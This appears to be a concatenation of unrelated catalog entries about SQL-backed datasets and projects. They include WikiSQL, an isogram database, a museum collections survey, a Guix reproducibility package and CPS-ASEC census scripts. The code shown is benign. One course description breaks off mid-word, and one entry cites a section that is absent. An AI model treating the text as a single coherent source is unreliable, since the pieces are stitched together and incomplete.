The repository includes an R script (R version 3) named "statistics.r" that computes a number of statistics about the distribution of isograms by length, frequency, contextual diversity, etc. This can be used as a starting point for running your own stats. It uses RSQLite to access the SQLite database version of the data described above.
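As a quick illustration, a Python query against the resulting database; the table name below is an assumption (section 1 documents the actual tables and their layout):

import sqlite3

conn = sqlite3.connect("isograms.db")
# Ten most frequent second-order isograms; column names as documented in section 1.
rows = conn.execute("""
    SELECT word, length, count
    FROM ngrams_isograms   -- hypothetical table name
    WHERE isogramy = 2
    ORDER BY count DESC
    LIMIT 10;
""").fetchall()
for word, length, count in rows:
    print(f"{word} ({length} letters, {count} tokens)")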
CC0 1.0 Universal Public Domain Dedication: https://creativecommons.org/publicdomain/zero/1.0/
License information was derived automatically
This dataset is a large, crowd-sourced collection designed for developing natural language interfaces for relational databases. It contains hand-annotated examples of natural language questions paired with their corresponding SQL queries. The data is derived from Wikipedia tables, providing a rich context for understanding how natural language can be translated into database queries. It serves as a valuable resource for training and testing models that aim to bridge the gap between human language and structured database interactions.
The dataset is typically provided in a CSV file format. It comprises 80,654 hand-annotated examples of questions and SQL queries. These examples are distributed across 24,241 distinct tables originating from Wikipedia. Specific numbers for rows or records beyond this total are not explicitly detailed, but unique values for questions are 5,069 and for SQL queries are 15,595.
This dataset is ideal for several applications: * Developing and improving natural language interfaces for relational databases. * Building a knowledge base of frequently used SQL queries. * Generating training sets for neural networks that convert natural language into SQL queries.
The dataset's scope is global, reflecting its origins from Wikipedia tables which have worldwide applicability. There are no specific geographical, time range, or demographic notes on data availability for particular groups or years within the dataset itself. It focuses on the general relationship between questions and SQL queries.
CC0
This dataset is intended for: * Data scientists developing machine learning models for language processing. * AI and ML researchers focused on natural language understanding (NLU) and natural language generation (NLG) in the context of databases. * Software developers creating intelligent database query tools or conversational AI agents that interact with databases. * Academics and students conducting research in areas like computational linguistics, database systems, and artificial intelligence.
Original Data Source: WikiSQL (Questions and SQL Queries)
With the daily growth of data in all kinds of sectors, such as Information Technologies (IT), healthcare, education, commerce or telecommunication, it becomes important to use a high-performance system to manage all this data in the best possible way. Indeed, in the absence of good data management, it can be difficult for these sectors to prevent data loss, ensure safe maintenance or guarantee data security. For this reason, an effective data management system is the Entity-Relationship model. Indeed, thanks to this model, all kinds of sectors have the possibility of designing and organizing their data in relational databases, thus improving data security and better internal communication. Furthermore, it is interesting to modernize the classic approach of the Entity-Relationship model and its visual representations of data in the present day. The technologies of Augmented and Virtual Reality respond precisely to this challenge of innovation in the Entity-Relationship model. Therefore, the first objective of this thesis is to implement the Entity-Relationship model in a Meta-Modeling Platform for Augmented and Virtual Reality. The second objective is to implement an algorithm that transforms an Entity-Relationship model into SQL statements to create database tables. The Entity-Relationship model is used to design the logic of a database, and the implementation of the algorithm is used to create the database.
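A toy sketch of the second objective, the transformation of an Entity-Relationship model into SQL statements; the entity/relationship representation below is invented for illustration, the thesis's actual meta-model being richer:

# Minimal ER description: entities map attribute names to SQL types.
entities = {
    "Student": {"student_id": "INTEGER PRIMARY KEY", "name": "VARCHAR(100)"},
    "Course":  {"course_id": "INTEGER PRIMARY KEY", "title": "VARCHAR(200)"},
}
# A many-to-many relationship becomes a junction table with foreign keys.
relationships = [("enrolled_in", "Student", "Course")]

def er_to_sql(entities, relationships):
    statements = []
    for entity, attributes in entities.items():
        columns = ", ".join(f"{name} {sqltype}" for name, sqltype in attributes.items())
        statements.append(f"CREATE TABLE {entity} ({columns});")
    for name, left, right in relationships:
        left_key = next(iter(entities[left]))    # first attribute serves as the key here
        right_key = next(iter(entities[right]))
        statements.append(
            f"CREATE TABLE {name} ("
            f"{left_key} INTEGER REFERENCES {left}({left_key}), "
            f"{right_key} INTEGER REFERENCES {right}({right_key}));"
        )
    return statements

for statement in er_to_sql(entities, relationships):
    print(statement)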
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
From 2016 to 2018, we surveyed the world’s largest natural history museum collections to begin mapping this globally distributed scientific infrastructure. The resulting dataset includes 73 institutions across the globe. It has:
Basic institution data for the 73 contributing institutions, including estimated total collection sizes, geographic locations (to the city) and latitude/longitude, and Research Organization Registry (ROR) identifiers where available.
Resourcing information, covering the numbers of research, collections and volunteer staff in each institution.
Indicators of the presence and size of collections within each institution broken down into a grid of 19 collection disciplines and 16 geographic regions.
Measures of the depth and breadth of individual researcher experience across the same disciplines and geographic regions.
This dataset contains the data (raw and processed) collected for the survey, along with specifications of the schema used to store the data.
The global collections data may also be accessed at https://rebrand.ly/global-collections. This is a preliminary dashboard, constructed and published using Microsoft Power BI, that enables the exploration of the data through a set of visualisations and filters. The dashboard consists of three pages:
Institutional profile: Enables the selection of a specific institution and provides summary information on the institution and its location, staffing, total collection size, collection breakdown and researcher expertise.
Overall heatmap: Supports an interactive exploration of the global picture, including a heatmap of collection distribution across the discipline and geographic categories, and visualisations that demonstrate the relative breadth of collections across institutions and correlations between collection size and breadth. Various filters allow the focus to be refined to specific regions and collection sizes.
Browse: Provides some alternative methods of filtering and visualising the global dataset to look at patterns in the distribution and size of different types of collections across the global view.
https://academictorrents.com/nolicensespecified
Official Course URL: udemy.com/course/sql-for-financial-data-analysis/

Course Overview: Unlock the power of SQL for financial data analysis and reporting. This course is tailored for non-tech professionals who want to streamline their analytics and reporting capabilities. Learn to extract and process financial data, prepare detailed reports like Profit & Loss Statements and Balance Sheets, and calculate critical financial ratios through practical exercises.

What You'll Learn:
- SQL Basics: Master database querying techniques for financial data.
- Report Preparation: Create Profit & Loss Statements, Balance Sheets, and Cash Flow Statements.
- Key Analytics: Calculate and interpret profitability, efficiency, and liquidity ratios.
- Database Skills: Gain hands-on experience without prior technical expertise.

Course Benefits:
- Practical Applications: Apply SQL to real-world financial scenarios.
- Independent Reporting: Reduce reliance on system-generated reports.
- Career Advancem
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Replication package for the paper:
Ludovic Courtès, Timothy Sample, Simon Tournier, Stefano Zacchiroli.
Source Code Archiving to the Rescue of Reproducible Deployment.
ACM REP'24, June 18-20, 2024, Rennes, France.
https://doi.org/10.1145/3641525.3663622
Generating the paper
The paper can be generated using the following command:
guix time-machine -C channels.scm \
  -- shell -C -m manifest.scm \
  -- make
This uses GNU Guix to run make in the exact same computational environment used when preparing the paper. The computational environment is described by two files. The channels.scm file specifies the exact version of the Guix package collection to use. The manifest.scm file selects a subset of those packages to include in the environment.
It may be possible to generate the paper without Guix. To do so, you will need the following software (on top of a Unix-like environment):
GNU Make
SQLite 3
GNU AWK
Rubber
Graphviz
TeXLive
Structure
data/ contains the data examined in the paper
scripts/ contains dedicated code for the paper
logs/ contains logs generated during certain computations
Preservation of Guix
Some of the claims in the paper come from analyzing the Preservation of Guix (PoG) database as published on January 26, 2024. This database is the result of years of monitoring the extent to which the source code referenced by Guix packages is archived. This monitoring has been carried out by Timothy Sample, who occasionally publishes reports on his personal website: https://ngyro.com/pog-reports/latest/. The database included in this package (data/pog.sql) was downloaded from https://ngyro.com/pog-reports/2024-01-26/pog.db and then exported to SQL format. In addition to the SQL file, the database schema is also included in this package as data/schema.sql.
The database itself is largely the result of scripts, but also of manual adjustments (where necessary or convenient). The scripts are available at https://git.ngyro.com/preservation-of-guix/, which is preserved in the Software Heritage archive as well: https://archive.softwareheritage.org/swh:1:snp:efba3456a4aff0bc25b271e128aa8340ae2bc816;origin=https://git.ngyro.com/preservation-of-guix. These scripts rely on the availability of source code in certain locations on the Internet, and therefore will not yield exactly the same result when run again.
Analysis
Here is an overview of how we use the PoG database in the paper. The exact way it is queried to produce graphs and tables for the paper is laid out in the Makefile.
The pog-types.sql query gives the counts of each source type (e.g. “git” or “tar-gz”) for each commit covered by the database.
The pog-status.sql query gives the archival status of the sources by commit. For each commit, it produces counts of how many sources are stored in the Software Heritage archive, missing from it, or of unknown status. The pog-status-total.sql query does the same thing over all sources, without sorting them into individual commits.
The disarchive-ratio.sql query estimates the success rate of Disarchive disassembly.
Finally, the swhid-ratio.sql query gives the proportion of sources for which the PoG database has an SWHID.
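A small sketch of running one of these queries from Python: the SQL dump is restored into an in-memory SQLite database, then the query file is executed. data/pog.sql is named above; the location of the query file is an assumption (the Makefile is authoritative):

import sqlite3

conn = sqlite3.connect(":memory:")
with open("data/pog.sql") as dump:      # SQL export of the PoG database
    conn.executescript(dump.read())
with open("pog-types.sql") as query:    # counts of each source type per commit
    for row in conn.execute(query.read()):
        print(row)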
Estimating missing sources
The Preservation of Guix database only covers sources from a sample of commits to the Guix repository. This greatly simplifies the process of collecting the sources at the risk of missing a few. We estimate how many are missed by searching Guix’s Git history for Nix-style base-32 hashes. The result of this search is compared to the hashes in the PoG database.
A naïve search of Git history results in an overestimate due to Guix's branch development model: it finds hashes that were never exposed to users of 'guix pull'. To work around this, we also approximate the history of commits available to 'guix pull'. We do this by scraping push events from the guix-commits mailing list archives (data/guix-commits.mbox). Unfortunately, those archives are not quite complete. Missing history is reconstructed in the data/missing-links.txt file.
This estimate requires a copy of the Guix Git repository (not included in this package). The repository can be obtained from GNU at https://git.savannah.gnu.org/git/guix.git or from the Software Heritage archive: https://archive.softwareheritage.org/swh:1:snp:9d7b8dcf5625c17e42d51357848baa226b70e4bb;origin=https://git.savannah.gnu.org/git/guix.git. Once obtained, its location must be specified in the Makefile.
To generate the estimate, use:
guix time-machine -C channels.scm \
  -- shell -C -m manifest.scm \
  -- make data/missing-sources.txt
If not using Guix, you will need additional software beyond what is used to generate the paper:
GNU Guile
GNU Bash
GNU Mailutils
GNU Parallel
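The hash search itself can be sketched as follows; this is a rough illustration, not the package's script. It assumes sha256 hashes in Nix base-32, a 52-character encoding whose alphabet omits e, o, t and u:

import re
import subprocess

# Nix-style base-32 strings, as used in Guix origin sha256 fields.
HASH_RE = re.compile(r"\b[0-9a-df-np-sv-z]{52}\b")

# Scan all patches in the repository history (the path to the Guix
# checkout is an assumption; the Makefile expects it to be configured).
log = subprocess.run(
    ["git", "-C", "guix", "log", "--all", "-p", "--format="],
    capture_output=True, text=True, check=True,
).stdout
hashes = set(HASH_RE.findall(log))
print(len(hashes), "candidate hashes found in history")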
Measuring link rot
In order to measure link rot, we ran Guix Scheme scripts, i.e., scripts that use Guix as a Scheme library. The scripts depend on the state of the world at the very specific moment when they ran, so it is not possible to reproduce exactly the same outputs. However, their tendency over time should be very similar. To run them, you need an installation of Guix. For instance,
guix repl -q scripts/table-per-origin.scm
When running these scripts for the paper, we tracked their output and saved it inside the logs directory.
analyze the current population survey (cps) annual social and economic supplement (asec) with r. the annual march cps-asec has been supplying the statistics for the census bureau's report on income, poverty, and health insurance coverage since 1948. wow. the us census bureau and the bureau of labor statistics (bls) tag-team on this one. until the american community survey (acs) hit the scene in the early aughts (2000s), the current population survey had the largest sample size of all the annual general demographic data sets outside of the decennial census - about two hundred thousand respondents. this provides enough sample to conduct state- and a few large metro area-level analyses. your sample size will vanish if you start investigating subgroups by state - consider pooling multiple years. county-level is a no-no. despite the american community survey's larger size, the cps-asec contains many more variables related to employment, sources of income, and insurance - and can be trended back to harry truman's presidency. aside from questions specifically asked about an annual experience (like income), many of the questions in this march data set should be treated as point-in-time statistics. cps-asec generalizes to the united states non-institutional, non-active duty military population. the national bureau of economic research (nber) provides sas, spss, and stata importation scripts to create a rectangular file (rectangular data means only person-level records; household- and family-level information gets attached to each person). to import these files into r, the parse.SAScii function uses nber's sas code to determine how to import the fixed-width file, then RSQLite to put everything into a schnazzy database. you can try reading through the nber march 2012 sas importation code yourself, but it's a bit of a proc freak show. this new github repository contains three scripts:

2005-2012 asec - download all microdata.R
download the fixed-width file containing household, family, and person records
import by separating this file into three tables, then merge 'em together at the person-level
download the fixed-width file containing the person-level replicate weights
merge the rectangular person-level file with the replicate weights, then store it in a sql database
create a new variable - one - in the data table

2012 asec - analysis examples.R
connect to the sql database created by the 'download all microdata' program
create the complex sample survey object, using the replicate weights
perform a boatload of analysis examples

replicate census estimates - 2011.R
connect to the sql database created by the 'download all microdata' program
create the complex sample survey object, using the replicate weights
match the sas output shown in the png file below

2011 asec replicate weight sas output.png
statistic and standard error generated from the replicate-weighted example sas script contained in this census-provided person replicate weights usage instructions document. click here to view these three scripts

for more detail about the current population survey - annual social and economic supplement (cps-asec), visit:
the census bureau's current population survey page
the bureau of labor statistics' current population survey page
the current population survey's wikipedia article

notes: interviews are conducted in march about experiences during the previous year. the file labeled 2012 includes information (income, work experience, health insurance) pertaining to 2011. when you use the current population survey to talk about america, subtract a year from the data file name. as of the 2010 file (the interview focusing on america during 2009), the cps-asec contains exciting new medical out-of-pocket spending variables most useful for supplemental (medical spending-adjusted) poverty research. confidential to sas, spss, stata, sudaan users: why are you still rubbing two sticks together after we've invented the butane lighter? time to transition to r. :D
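for readers outside the r ecosystem, the same pattern (fixed-width import, then storage in a sql database) can be sketched in python with pandas - a rough analogue, not the repository's code, and the column layout below is made up (the real one comes from nber's sas importation script):

import sqlite3
import pandas as pd

# hypothetical fixed-width layout: (start, end) byte offsets and field names
colspecs = [(0, 1), (1, 6), (6, 8)]
names = ["rectype", "serial", "age"]

df = pd.read_fwf("asec2012.dat", colspecs=colspecs, names=names)  # fixed-width import
conn = sqlite3.connect("cps_asec.db")
df.to_sql("asec12", conn, index=False, if_exists="replace")       # store in a sql database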